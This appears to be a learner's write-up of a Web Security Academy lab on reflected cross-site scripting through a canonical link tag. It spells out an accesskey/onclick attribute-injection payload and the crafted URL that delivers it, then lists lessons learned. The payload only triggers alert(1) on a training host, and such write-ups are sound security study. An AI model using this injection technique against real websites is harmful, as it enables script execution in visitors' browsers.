Problem Statement

This lab reflects user input in a canonical link tag and escapes angle brackets.

To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.

To assist with your exploit, you can assume that the simulated user will press the following key combinations:

• ALT+SHIFT+X
• CTRL+ALT+X
• Alt+X

Please note that the intended solution to this lab is only possible in Chrome.

Felix

Solution

Link elements: Access key attributes can enable XSS on normally unexploitable elements

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
1. It is hinted that the entry point is in the canonical link tag.
2. Browse Burp XSS Cheatsheet and get the above exploit
3. Entry point is accessible via GET request or when visiting the website
4. What we want is to have
<link rel="canonical" href='<https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/{}>'/>
<link rel="canonical" href='https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/?'accesskey='X'onclick='alert(1)'/>
5. Which we can achieve by
<https://ac791fd81f18b495c14e124a00e700fc.web-security-academy.net/?'accesskey='X'onclick='alert(1)>

Proof

What have you learnt?

1. I spent too much time in finding the entry point. I thought it is comment field (stored) but apparently it has been hinted that it is the link canonical tag (reflected).
2. Burp Suite XSS Cheatsheet is quite useful
3. To inject , use ? before payload. abc.com/?